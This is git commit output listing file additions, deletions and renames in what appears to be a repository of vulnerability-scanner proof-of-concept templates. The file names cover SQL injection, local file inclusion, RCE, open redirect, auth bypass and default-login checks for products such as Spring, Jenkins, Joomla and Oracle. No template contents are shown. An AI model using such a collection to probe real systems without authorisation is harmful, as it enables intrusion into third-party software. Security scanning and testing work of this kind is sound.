create mode 100644 poc/injection/duomicms-sql-injection.yaml
create mode 100644 poc/injection/glpi-9.3.3-sql-injection.yaml
create mode 100644 poc/injection/header-command-injection-7919.yaml
delete mode 100644 poc/injection/host-header-injection-8000.yaml
create mode 100644 poc/java/default-jetty-page-6862.yaml
delete mode 100644 poc/java/ecology-springframework-directory-traversal-7175.yaml
create mode 100644 poc/java/ecology-springframework-directory-traversal.yaml
create mode 100644 poc/java/exposed-alps-spring-7283.yaml
create mode 100644 poc/java/java-rmi-detect-8227.yaml
create mode 100644 poc/java/jboss-detect-8237.yaml
delete mode 100644 poc/java/jboss-detect.yaml
delete mode 100644 poc/java/jetty-showcontexts-enable-8297.yaml
create mode 100644 poc/java/jinfornet-jreport-lfi-8307.yaml
delete mode 100644 poc/java/jinfornet-jreport-lfi-8308.yaml
delete mode 100644 poc/java/jsf-detection-8397.yaml
create mode 100644 poc/java/jsf-detection-8398.yaml
delete mode 100644 poc/java/public-tomcat-manager-9708.yaml
delete mode 100644 poc/java/shiro-detect-10196.yaml
delete mode 100644 poc/java/spring-framework-exceptions-10493.yaml
create mode 100644 poc/java/spring-framework-exceptions.yaml
create mode 100644 poc/java/springForShell-CVE-2022-22963.yaml
delete mode 100644 poc/java/springboot-actuator-10435.yaml
create mode 100644 poc/java/springboot-actuators-jolokia-xxe-10430.yaml
delete mode 100644 poc/java/springboot-actuators-jolokia-xxe-10431.yaml
delete mode 100644 poc/java/springboot-autoconfig.yaml
create mode 100644 poc/java/springboot-configprops-10442.yaml
create mode 100644 poc/java/springboot-env-10450.yaml
rename poc/java/{springboot-h2-db-rce-10457.yaml => springboot-h2-db-rce.yaml} (100%)
create mode 100644 poc/java/springboot-health-10459.yaml
delete mode 100644 poc/java/springboot-health.yaml
delete mode 100644 poc/java/springboot-heapdump-10463.yaml
create mode 100644 poc/java/springboot-info.yaml
delete mode 100644 poc/java/springboot-loggers-10476.yaml
create mode 100644 poc/java/springboot-loggers-10477.yaml
create mode 100644 poc/java/springboot-mappings-10478.yaml
delete mode 100644 poc/java/springboot-mappings-10481.yaml
delete mode 100644 poc/java/springboot-threaddump-10486.yaml
delete mode 100644 poc/java/springboot-trace.yaml
delete mode 100644 poc/java/struts-problem-report-10563.yaml
create mode 100644 poc/java/struts-problem-report-10564.yaml
create mode 100644 poc/java/tomcat-default-login.yaml
delete mode 100644 poc/java/tomcat-pathnormalization.yaml
rename poc/java/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%)
delete mode 100644 poc/java/weblogic-weak-login-11154.yaml
rename poc/java/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%)
rename poc/java/{wildfly-panel-11211.yaml => wildfly-panel-11209.yaml} (100%)
delete mode 100644 poc/javascript/bower-json-769.yaml
create mode 100644 poc/javascript/bower-json.yaml
delete mode 100644 poc/javascript/fastjson-1-2-24-rce.yaml
create mode 100644 poc/javascript/fastjson-1-2-41-rce.yaml
rename poc/javascript/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%)
create mode 100644 poc/javascript/fastjson-1-2-43-rce-7412.yaml
create mode 100644 poc/javascript/fastjson-1-2-62-rce-7419.yaml
delete mode 100644 poc/javascript/jsf-detection-8397.yaml
create mode 100644 poc/javascript/jsf-detection-8398.yaml
delete mode 100644 poc/javascript/jsherp-boot-panel.yaml
rename poc/javascript/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%)
create mode 100644 poc/javascript/package-json-9421.yaml
delete mode 100644 poc/javascript/package-json.yaml
rename poc/javascript/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%)
rename poc/jenkins/{jenkins-default.yaml => jenkins-default-8272.yaml} (100%)
delete mode 100644 poc/jenkins/jenkins-detect-8275.yaml
create mode 100644 poc/jenkins/jenkins-detect-8276.yaml
delete mode 100644 poc/jenkins/jenkins-login-8277.yaml
create mode 100644 poc/jenkins/jenkins-login-8280.yaml
delete mode 100644 poc/jenkins/jenkins-script-8284.yaml
create mode 100644 poc/jenkins/jenkins-script.yaml
create mode 100644 poc/jenkins/jenkins-stack-trace-8285.yaml
rename poc/joomla/{joomla-com-fabrik-lfi-8371.yaml => joomla-com-fabrik-lfi.yaml} (100%)
create mode 100644 poc/joomla/joomla-file-listing-8380.yaml
delete mode 100644 poc/joomla/joomla-file-listing.yaml
create mode 100644 poc/joomla/joomla-panel-8389.yaml
delete mode 100644 poc/joomla/joomla-panel-8391.yaml
delete mode 100644 poc/joomla/joomla-workflow.yaml
create mode 100644 poc/joomla/rusty-joomla.yaml
create mode 100644 poc/kafka/kafka-center-default-login.yaml
create mode 100644 poc/kafka/kafka-consumer-monitor-8424.yaml
delete mode 100644 poc/kafka/kafka-consumer-monitor-8425.yaml
create mode 100644 poc/kafka/kafka-monitoring-8428.yaml
delete mode 100644 poc/kafka/kafka-monitoring-8431.yaml
delete mode 100644 poc/laravel/laravel-debug-enabled-8576.yaml
delete mode 100644 poc/laravel/laravel-debug-enabled.yaml
create mode 100644 poc/laravel/laravel-env-8582.yaml
create mode 100644 poc/laravel/laravel-ignition-xss.yaml
delete mode 100644 poc/laravel/laravel-log-file-8596.yaml
create mode 100644 poc/ldap/phpldapadmin-panel.yaml
create mode 100644 poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml
delete mode 100644 poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml
delete mode 100644 poc/local_file_inclusion/ad-widget-lfi-124.yaml
create mode 100644 poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml
rename poc/local_file_inclusion/{advanced-access-manager-lfi-118.yaml => advanced-access-manager-lfi-116.yaml} (100%)
delete mode 100644 poc/local_file_inclusion/advanced-access-manager-lfi.yaml
delete mode 100644 poc/local_file_inclusion/asanhamayesh-lfi-552.yaml
create mode 100644 poc/local_file_inclusion/asanhamayesh-lfi-553.yaml
delete mode 100644 poc/local_file_inclusion/bems-api-lfi-709.yaml
delete mode 100644 poc/local_file_inclusion/bems-api-lfi-712.yaml
delete mode 100644 poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml
delete mode 100644 poc/local_file_inclusion/brandfolder-lfi.yaml
delete mode 100644 poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml
create mode 100644 poc/local_file_inclusion/cherry-lfi-903.yaml
delete mode 100644 poc/local_file_inclusion/churchope-lfi.yaml
create mode 100644 poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml
rename poc/local_file_inclusion/{cs-cart-unauthenticated-lfi-1285.yaml => cs-cart-unauthenticated-lfi.yaml} (100%)
delete mode 100644 poc/local_file_inclusion/db-backup-lfi-6774.yaml
create mode 100644 poc/local_file_inclusion/db-backup-lfi-6775.yaml
delete mode 100644 poc/local_file_inclusion/diarise-theme-lfi.yaml
delete mode 100644 poc/local_file_inclusion/elfinder-path-traversal-7203.yaml
rename poc/local_file_inclusion/{elFinder-path-traversal.yaml => elfinder-path-traversal.yaml} (100%)
delete mode 100644 poc/local_file_inclusion/elfinder-version.yaml
create mode 100644 poc/local_file_inclusion/generic-windows-lfi-7591.yaml
create mode 100644 poc/local_file_inclusion/global-domains-lfi.yaml
delete mode 100644 poc/local_file_inclusion/goip-1-lfi-7764.yaml
create mode 100644 poc/local_file_inclusion/groupoffice-lfi-7849.yaml
create mode 100644 poc/local_file_inclusion/groupoffice-lfi.yaml
create mode 100644 poc/local_file_inclusion/gsoap-lfi.yaml
delete mode 100644 poc/local_file_inclusion/hide-security-enhancer-lfi.yaml
delete mode 100644 poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml
delete mode 100644 poc/local_file_inclusion/huawei-hg659-lfi.yaml
create mode 100644 poc/local_file_inclusion/issuu-panel-lfi.yaml
delete mode 100644 poc/local_file_inclusion/jeewms-lfi.yaml
create mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml
delete mode 100644 poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml
create mode 100644 poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml
rename poc/local_file_inclusion/{jolokia-unauthenticated-lfi-8364.yaml => jolokia-unauthenticated-lfi.yaml} (100%)
rename poc/local_file_inclusion/{joomla-com-fabrik-lfi-8371.yaml => joomla-com-fabrik-lfi.yaml} (100%)
create mode 100644 poc/local_file_inclusion/lfi-linux-fuzz.yaml
create mode 100644 poc/local_file_inclusion/minimouse-lfi-8877.yaml
delete mode 100644 poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml
delete mode 100644 poc/local_file_inclusion/mpsec-lfi.yaml
delete mode 100644 poc/local_file_inclusion/opencti-lfi-9268.yaml
delete mode 100644 poc/local_file_inclusion/opensis-lfi.yaml
create mode 100644 poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml
rename poc/local_file_inclusion/{pacsone-server-lfi.yaml => pacsone-server-lfi-9428.yaml} (100%)
delete mode 100644 poc/local_file_inclusion/pikpikculfi.yaml
delete mode 100644 poc/local_file_inclusion/qihang-media-lfi-9769.yaml
create mode 100644 poc/local_file_inclusion/qihang-media-lfi.yaml
create mode 100644 poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml
delete mode 100644 poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml
create mode 100644 poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml
create mode 100644 poc/local_file_inclusion/sl-studio-lfi.yaml
create mode 100644 poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml
create mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10721.yaml
delete mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10723.yaml
create mode 100644 poc/local_file_inclusion/video-synchro-pdf-lfi-11007.yaml
delete mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml
create mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi.yaml
delete mode 100644 poc/local_file_inclusion/wordpress-lfi.yaml
create mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml
delete mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml
create mode 100644 poc/local_file_inclusion/wp-javospot-lfi-11482.yaml
delete mode 100644 poc/local_file_inclusion/wp-javospot-lfi.yaml
create mode 100644 poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml
delete mode 100644 poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml
rename poc/local_file_inclusion/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%)
create mode 100644 poc/local_file_inclusion/xerox-efi-lfi.yaml
create mode 100644 poc/local_file_inclusion/yishaadmin-lfi.yaml
create mode 100644 poc/magento/magento-2-exposed-api-8688.yaml
create mode 100644 poc/magento/magento-admin-panel-8690.yaml
delete mode 100644 poc/magento/magento-admin-panel-8692.yaml
delete mode 100644 poc/magento/magento-cacheleak-8699.yaml
delete mode 100644 poc/magento/magento-config-disclosure.yaml
rename poc/microsoft/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%)
rename poc/microsoft/{aims-password-mgmt-client-218.yaml => aims-password-mgmt-client-219.yaml} (100%)
create mode 100644 poc/microsoft/aims-password-mgmt-client-221.yaml
create mode 100644 poc/microsoft/aims-password-portal-225.yaml
delete mode 100644 poc/microsoft/bems-api-lfi-709.yaml
delete mode 100644 poc/microsoft/bems-api-lfi-712.yaml
delete mode 100644 poc/microsoft/bolt-cms-panel-762.yaml
create mode 100644 poc/microsoft/bolt-cms-panel-763.yaml
rename poc/microsoft/{call-break-cms-840.yaml => call-break-cms-838.yaml} (100%)
delete mode 100644 poc/microsoft/chamilo-lms-sqli-892.yaml
create mode 100644 poc/microsoft/chamilo-lms-sqli.yaml
create mode 100644 poc/microsoft/cisco-systems-login-973.yaml
delete mode 100644 poc/microsoft/cisco-systems-login-975.yaml
delete mode 100644 poc/microsoft/craft-cms-detect.yaml
create mode 100644 poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml
rename poc/microsoft/{dedecms-carbuyaction-fileinclude-6792.yaml => dedecms-carbuyaction-fileinclude.yaml} (100%)
rename poc/microsoft/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%)
rename poc/microsoft/{dotcms-admin-panel-7085.yaml => dotcms-admin-panel-7087.yaml} (100%)
delete mode 100644 poc/microsoft/dotnetcms-sqli.yaml
create mode 100644 poc/microsoft/duomicms-sql-injection-7124.yaml
create mode 100644 poc/microsoft/duomicms-sql-injection.yaml
rename poc/microsoft/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%)
delete mode 100644 poc/microsoft/empirecms-xss-7220.yaml
delete mode 100644 poc/microsoft/ems-login-panel-7223.yaml
delete mode 100644 poc/microsoft/feifeicms-lfr.yaml
delete mode 100644 poc/microsoft/grav-cms-detect.yaml
create mode 100644 poc/microsoft/isams-panel.yaml
delete mode 100644 poc/microsoft/jeewms-lfi.yaml
delete mode 100644 poc/microsoft/kevinlab-bems-sqli-8457.yaml
delete mode 100644 poc/microsoft/kevinlab-hems-backdoor-8467.yaml
delete mode 100644 poc/microsoft/lotuscms-rce-8650.yaml
create mode 100644 poc/microsoft/lotuscms-rce-8652.yaml
delete mode 100644 poc/microsoft/metatag-cms-8833.yaml
create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8853.yaml
create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8854.yaml
delete mode 100644 poc/microsoft/microsoft-exchange-workflow-8855.yaml
create mode 100644 poc/microsoft/microsoft-exchange-workflow.yaml
delete mode 100644 poc/microsoft/ms-adcs-detect-8960.yaml
create mode 100644 poc/microsoft/ms-adcs-detect-8961.yaml
create mode 100644 poc/microsoft/msmtp-config-8967.yaml
delete mode 100644 poc/microsoft/myucms-lfr-8985.yaml
delete mode 100644 poc/microsoft/myucms-lfr-8987.yaml
delete mode 100644 poc/microsoft/netlify-cms-9039.yaml
create mode 100644 poc/microsoft/netlify-cms-9041.yaml
delete mode 100644 poc/microsoft/octobercms-default-login-9192.yaml
create mode 100644 poc/microsoft/octobercms-default-login.yaml
delete mode 100644 poc/microsoft/octobercms-detect-9195.yaml
create mode 100644 poc/microsoft/odoo-cms-redirect-9199.yaml
delete mode 100644 poc/microsoft/pandora-fms-console-9451.yaml
create mode 100644 poc/microsoft/pandora-fms-console-9453.yaml
create mode 100644 poc/microsoft/pbootcms-database-file-download-9469.yaml
delete mode 100644 poc/microsoft/plone-cms-detect-9607.yaml
rename poc/microsoft/{plone-cms-detect.yaml => plone-cms-detect-9608.yaml} (100%)
create mode 100644 poc/microsoft/powercreator-cms-rce-9645.yaml
create mode 100644 poc/microsoft/powercreator-cms-rce.yaml
create mode 100644 poc/microsoft/quick-cms-sqli.yaml
create mode 100644 poc/microsoft/rhymix-cms-detect-9878.yaml
delete mode 100644 poc/microsoft/saferoads-vms-login-9971.yaml
create mode 100644 poc/microsoft/saferoads-vms-login-9973.yaml
create mode 100644 poc/microsoft/samsung-wlan-ap-lfi-10000.yaml
delete mode 100644 poc/microsoft/samsung-wlan-ap-lfi-9999.yaml
create mode 100644 poc/microsoft/samsung-wlan-ap-xss-10012.yaml
delete mode 100644 poc/microsoft/samsung-wlan-ap-xss.yaml
create mode 100644 poc/microsoft/samsung-wlan-default-login-10018.yaml
create mode 100644 poc/microsoft/seacms-rce-10101.yaml
create mode 100644 poc/microsoft/seacms-sqli-10103.yaml
create mode 100644 poc/microsoft/seeddms-detect-10131.yaml
delete mode 100644 poc/microsoft/sevone-nms-network-manager.yaml
create mode 100644 poc/microsoft/tikiwiki-cms-10773.yaml
delete mode 100644 poc/microsoft/tikiwiki-cms-10775.yaml
create mode 100644 poc/microsoft/top-xss-params-10807.yaml
delete mode 100644 poc/microsoft/top-xss-params-10809.yaml
create mode 100644 poc/microsoft/vpms-auth-bypass-11066.yaml
delete mode 100644 poc/microsoft/vpms-auth-bypass-11068.yaml
rename poc/microsoft/{wems-manager-xss.yaml => wems-manager-xss-11192.yaml} (100%)
create mode 100644 poc/microsoft/wondercms-detect-11222.yaml
delete mode 100644 poc/microsoft/wondercms-detect.yaml
create mode 100644 poc/microsoft/wp-arforms-listing-11415.yaml
create mode 100644 poc/microsoft/wp-mstore-plugin-listing-11500.yaml
rename poc/microsoft/{wp-sfwd-lms-listing-11562.yaml => wp-sfwd-lms-listing-11564.yaml} (100%)
create mode 100644 poc/microsoft/wuzhicms-detect-11654.yaml
create mode 100644 poc/microsoft/wuzhicms-detect.yaml
delete mode 100644 poc/microsoft/xdcms-sqli-11664.yaml
delete mode 100644 poc/microsoft/zcms-v3-sqli-11773.yaml
create mode 100644 poc/microsoft/zms-auth-bypass-11830.yaml
delete mode 100644 poc/microsoft/zms-auth-bypass-11832.yaml
create mode 100644 poc/mongodb/alibaba-mongoshake-unauth-268.yaml
create mode 100644 poc/mongodb/mongodb-detect-8920.yaml
delete mode 100644 poc/mongodb/mongodb-unauth-8925.yaml
create mode 100644 poc/mongodb/rockmongo-default-login-9897.yaml
delete mode 100644 poc/mongodb/rockmongo-xss-9902.yaml
create mode 100644 poc/mongodb/unauthenticated-mongo-express.yaml
delete mode 100644 poc/netlify/api-netlify-470.yaml
create mode 100644 poc/netlify/api-netlify.yaml
delete mode 100644 poc/netlify/netlify-cms-9039.yaml
create mode 100644 poc/netlify/netlify-cms-9041.yaml
create mode 100644 poc/nginx/default-nginx-page-6881.yaml
rename poc/nginx/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%)
create mode 100644 poc/nginx/git-config-nginxoffbyslash-7630.yaml
rename poc/nginx/{nginx-config.yaml => nginx-config-9099.yaml} (100%)
delete mode 100644 poc/nginx/nginx-linux-page-9102.yaml
delete mode 100644 poc/nginx/nginx-linux-page.yaml
delete mode 100644 poc/nginx/nginx-version-9122.yaml
create mode 100644 poc/nginx/nginx-version-9123.yaml
delete mode 100644 poc/nodejs/kube-api-nodes-8508.yaml
delete mode 100644 poc/nodejs/kube-api-nodes.yaml
delete mode 100644 poc/nodejs/lfr_express.yaml
create mode 100644 poc/nodejs/node-ecstatic-listing.yaml
create mode 100644 poc/nodejs/node-integration-enabled-9136.yaml
delete mode 100644 poc/nodejs/node-integration-enabled-9137.yaml
delete mode 100644 poc/nodejs/puppet-node-manager-detect-9720.yaml
create mode 100644 poc/nodejs/puppet-node-manager-detect.yaml
create mode 100644 poc/nodejs/unauthenticated-mongo-express.yaml
create mode 100644 poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml
delete mode 100644 poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml
delete mode 100644 poc/open_redirect/age-gate-open-redirect-207.yaml
create mode 100644 poc/open_redirect/age-gate-open-redirect.yaml
delete mode 100644 poc/open_redirect/attitude-theme-open-redirect.yaml
create mode 100644 poc/open_redirect/aws-redirect-651.yaml
delete mode 100644 poc/open_redirect/brandfolder-open-redirect-779.yaml
create mode 100644 poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml
delete mode 100644 poc/open_redirect/eatery-restaurant-open-redirect.yaml
delete mode 100644 poc/open_redirect/homeautomation-v3-openredirect-7985.yaml
delete mode 100644 poc/open_redirect/httpbin-open-redirect.yaml
create mode 100644 poc/open_redirect/music-store-open-redirect.yaml
delete mode 100644 poc/open_redirect/newsletter-open-redirect.yaml
create mode 100644 poc/open_redirect/odoo-cms-redirect-9199.yaml
delete mode 100644 poc/open_redirect/office365-open-redirect-9215.yaml
delete mode 100644 poc/open_redirect/otobo-open-redirect-9409.yaml
delete mode 100644 poc/open_redirect/pieregister-plugin-open-redirect.yaml
create mode 100644 poc/open_redirect/pollbot-redirect-9622.yaml
delete mode 100644 poc/open_redirect/sap-redirect.yaml
delete mode 100644 poc/open_redirect/ultimatemember-open-redirect-10877.yaml
delete mode 100644 poc/open_redirect/weekender-newspaper-open-redirect.yaml
delete mode 100644 poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml
rename poc/open_redirect/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%)
create mode 100644 poc/open_redirect/wp-grimag-open-redirect-11458.yaml
rename poc/open_redirect/{wp-gtranslate-open-redirect.yaml => wp-gtranslate-open-redirect-11463.yaml} (100%)
delete mode 100644 poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml
delete mode 100644 poc/open_redirect/wp-prostore-open-redirect-11546.yaml
create mode 100644 poc/open_redirect/wp-prostore-open-redirect-11550.yaml
create mode 100644 poc/open_redirect/wptouch-open-redirect-11592.yaml
create mode 100644 poc/oracle/metadata-oracle-8829.yaml
delete mode 100644 poc/oracle/metadata-oracle.yaml
delete mode 100644 poc/oracle/oracle-business-control-9347.yaml
delete mode 100644 poc/oracle/oracle-dbass-detect-9351.yaml
delete mode 100644 poc/oracle/oracle-dbass-detect.yaml
delete mode 100644 poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml
create mode 100644 poc/oracle/oracle-ebs-xss-9373.yaml
delete mode 100644 poc/oracle/oracle-ebs-xss-9376.yaml
create mode 100644 poc/oracle/oracle-http-server-12c-9384.yaml
delete mode 100644 poc/oracle/oracle-integrated-manager-9386.yaml
create mode 100644 poc/oracle/oracle-iplanet-web-server-9392.yaml
delete mode 100644 poc/oracle/oracle-iplanet-web-server.yaml
create mode 100644 poc/oracle/oracle-opera-login.yaml
delete mode 100644 poc/oracle/oracle-people-enterprise-9394.yaml
create mode 100644 poc/other/LayerSlider-plugin.yaml
delete mode 100644 poc/other/X-Remote-IP.yaml
create mode 100644 poc/other/acenet-panel.yaml
delete mode 100644 poc/other/activemq-panel-49.yaml
create mode 100644 poc/other/activemq-panel-53.yaml
rename poc/other/{acunetix-panel.yaml => acunetix-panel-56.yaml} (100%)
rename poc/other/{acunetix-panel-54.yaml => acunetix-panel-58.yaml} (100%)
delete mode 100644 poc/other/adminer-panel-74.yaml
create mode 100644 poc/other/adminer-panel-77.yaml
create mode 100644 poc/other/adminset-panel-79.yaml
delete mode 100644 poc/other/adminset-panel-80.yaml
create mode 100644 poc/other/advance-setup-119.yaml
delete mode 100644 poc/other/akamai-cloudtest-253.yaml
delete mode 100644 poc/other/alibaba-canal-info-leak-266.yaml
create mode 100644 poc/other/alienvault-usm-271.yaml
delete mode 100644 poc/other/ampps-admin-panel-305.yaml
create mode 100644 poc/other/ampps-admin-panel-306.yaml
rename poc/other/{ampps-dirlisting.yaml => ampps-dirlisting-307.yaml} (100%)
create mode 100644 poc/other/ampps-panel-310.yaml
create mode 100644 poc/other/ansible-semaphore-panel.yaml
delete mode 100644 poc/other/antsword-backdoor-333.yaml
create mode 100644 poc/other/antsword-backdoor.yaml
delete mode 100644 poc/other/artifactory-anonymous-deploy-549.yaml
create mode 100644 poc/other/aspose-file-download-558.yaml
delete mode 100644 poc/other/aspose-pdf-file-download.yaml
create mode 100644 poc/other/aspose-words-file-download-571.yaml
create mode 100644 poc/other/audiobookshelf-panel.yaml
delete mode 100644 poc/other/automation-direct-597.yaml
delete mode 100644 poc/other/axis-happyaxis-670.yaml
create mode 100644 poc/other/axis-happyaxis.yaml
rename poc/other/{barracuda-panel-685.yaml => barracuda-panel.yaml} (100%)
rename poc/other/{basic-dns-example.yaml => basic.yaml} (100%)
create mode 100644 poc/other/beyondtrust-panel-720.yaml
delete mode 100644 poc/other/bigip.yaml
create mode 100644 poc/other/bitrix-panel-748.yaml
delete mode 100644 poc/other/bitrix-panel-750.yaml
rename poc/other/{bookstack-panel-767.yaml => bookstack-panel-766.yaml} (100%)
delete mode 100644 poc/other/buddy-panel-797.yaml
create mode 100644 poc/other/buddy-panel.yml
rename poc/other/{cacti-panel-829.yaml => cacti-panel-828.yaml} (100%)
create mode 100644 poc/other/cacti-weathermap-file-write-832.yaml
delete mode 100644 poc/other/cacti-weathermap-file-write-833.yaml
delete mode 100644 poc/other/campaignmonitor-841.yaml
create mode 100644 poc/other/campaignmonitor-842.yaml
create mode 100644 poc/other/can-i-take-over-dns-852.yaml
delete mode 100644 poc/other/cerebro-panel-878.yaml
create mode 100644 poc/other/cerebro-panel-881.yaml
delete mode 100644 poc/other/certificate-validation-882.yaml
create mode 100644 poc/other/certificate-validation-884.yaml
create mode 100644 poc/other/cgi-printenv.yaml
rename poc/other/{cgi-test-page-888.yaml => cgi-test-page-887.yaml} (100%)
delete mode 100644 poc/other/checkpoint-panel-898.yaml
create mode 100644 poc/other/circarlife-setup-918.yaml
delete mode 100644 poc/other/circarlife-setup-920.yaml
create mode 100644 poc/other/citrix-oob-memory-read.yaml
rename poc/other/{clearpass-policy-manager-997.yaml => clearpass-policy-manager-1001.yaml} (100%)
rename poc/other/{clientaccesspolicy-1007.yaml => clientaccesspolicy-1005.yaml} (100%)
delete mode 100644 poc/other/cofense-vision-panel-1141.yaml
create mode 100644 poc/other/cofense-vision-panel-1142.yaml
delete mode 100644 poc/other/contact-form-7.yaml
create mode 100644 poc/other/crossdomain-xml-1267.yaml
create mode 100644 poc/other/csod-panel-1286.yaml
create mode 100644 poc/other/custom_nuclei-3.yaml
create mode 100644 poc/other/d-link-arbitary-fileread-7043.yaml
delete mode 100644 poc/other/d-link-arbitary-fileread-7044.yaml
delete mode 100644 poc/other/d-link-wireless-7047.yaml
delete mode 100644 poc/other/dead-host-with-cname-6786.yaml
create mode 100644 poc/other/deimos-c2.yaml
delete mode 100644 poc/other/development-logs-6989.yaml
rename poc/other/{diaowen-fileread(1).yaml => diaowen-fileread.yaml} (100%)
create mode 100644 poc/other/dir-listing-7003.yaml
create mode 100644 poc/other/dlink-850l-info-leak-7035.yaml
create mode 100644 poc/other/dlink-850l-info-leak-7039.yaml
mode change 100755 => 100644 poc/other/dlink-file-read.yaml
delete mode 100644 poc/other/dokuwiki-panel.yaml
create mode 100644 poc/other/drone-ci-panel-7091.yaml
create mode 100644 poc/other/druid-monitor-7102.yaml
delete mode 100644 poc/other/druid-monitor-7103.yaml
create mode 100644 poc/other/ds-store-file.yaml
create mode 100644 poc/other/dss-download-fileread.yaml
delete mode 100644 poc/other/dxplanning-panel.yaml
rename poc/other/{dynamic-broadcast-receiver-7140.yaml => dynamic-broadcast-receiver-7141.yaml} (100%)
create mode 100644 poc/other/easy-media-gallery-pro-listing-7152.yaml
rename poc/other/{Bitrix_check_env.yaml => env.yaml} (100%)
delete mode 100644 poc/other/envision-gateway.yaml
create mode 100644 poc/other/error-logs-7255.yaml
create mode 100644 poc/other/f-secure-policy-manager-7560.yaml
rename poc/other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel-7435.yaml} (100%)
rename poc/other/{file-scheme-7468.yaml => file-scheme-7467.yaml} (100%)
create mode 100644 poc/other/filezilla-7470.yaml
create mode 100644 poc/other/formula.yaml
delete mode 100644 poc/other/fortinet-fortigate-panel-7536.yaml
delete mode 100644 poc/other/foulenzer-subdomain-tk (copy 1).yaml
delete mode 100644 poc/other/gespage-panel-7605.yaml
create mode 100644 poc/other/gespage-panel-7606.yaml
delete mode 100644 poc/other/globalprotect-panel-7720.yaml
delete mode 100644 poc/other/glpi-directory-listing-7734.yaml
create mode 100644 poc/other/glpi-directory-listing.yaml
delete mode 100644 poc/other/glpidirectorylisting(1).yaml
create mode 100644 poc/other/gogs-workflow-7760.yaml
delete mode 100644 poc/other/gogs-workflow.yaml
create mode 100644 poc/other/goodjob-dashboard.yaml
delete mode 100644 poc/other/h2console-panel-7866.yaml
delete mode 100644 poc/other/hack5-cloud-c2.yaml
create mode 100644 poc/other/haivision-gateway-panel.yaml
delete mode 100644 poc/other/hanming-lfr.yaml
rename poc/other/{harbor-workflow-7889.yaml => harbor-workflow.yaml} (100%)
delete mode 100644 poc/other/heatmiser-wifi-thermostat.yaml
delete mode 100644 poc/other/hikvision-info-leak-7958.yaml
create mode 100644 poc/other/hikvision-info-leak.yaml
create mode 100644 poc/other/hitron-technologies-7961.yaml
delete mode 100644 poc/other/hitron-technologies-7962.yaml
delete mode 100644 poc/other/hjtcloud-arbitrary-file-read-7967.yaml
rename poc/other/{hjtcloud-rest-arbitrary-file-read-7973.yaml => hjtcloud-rest-arbitrary-file-read.yaml} (100%)
delete mode 100644 poc/other/hmc-hybris-panel-7977.yaml
create mode 100644 poc/other/hmc-hybris-panel-7978.yaml
create mode 100644 poc/other/honeywell-building-control-7987.yaml
delete mode 100644 poc/other/honeywell-building-control-7988.yaml
rename poc/other/{hp-ilo-5-8021.yaml => hp-ilo-5-8018.yaml} (100%)
create mode 100644 poc/other/hp-ilo-5-8020.yaml
delete mode 100644 poc/other/hp-service-manager-8032.yaml
create mode 100644 poc/other/hp-service-manager-8034.yaml
delete mode 100644 poc/other/hpe-system-management-anonymous-8013.yaml
delete mode 100644 poc/other/huawei-hg532e-panel-8066.yaml
create mode 100644 poc/other/huijietong-cloud-fileread.yaml
delete mode 100644 poc/other/identity-services-engine-8146.yaml
delete mode 100644 poc/other/identityguard-selfservice-entrust-8142.yaml
delete mode 100644 poc/other/immich-panel.yaml
delete mode 100644 poc/other/interactsh-server-8165.yaml
create mode 100644 poc/other/interactsh-server.yaml
create mode 100644 poc/other/internet-service-8178.yaml
delete mode 100644 poc/other/internet-service.yaml
rename poc/other/{ioncube-loader-wizard-8184.yaml => ioncube-loader-wizard.yaml} (100%)
rename poc/other/{itop-panel-8204.yaml => itop-panel-8205.yaml} (100%)
delete mode 100644 poc/other/jamf-panel-8216.yaml
delete mode 100644 poc/other/jfrog-8306.yaml
delete mode 100644 poc/other/jkstatus-manager-8344.yaml
create mode 100644 poc/other/jmx-console-8351.yaml
delete mode 100644 poc/other/jmx-console-8352.yaml
rename poc/other/{jolokia-8367.yaml => jolokia-8369.yaml} (100%)
delete mode 100644 poc/other/jolokia-list-8360.yaml
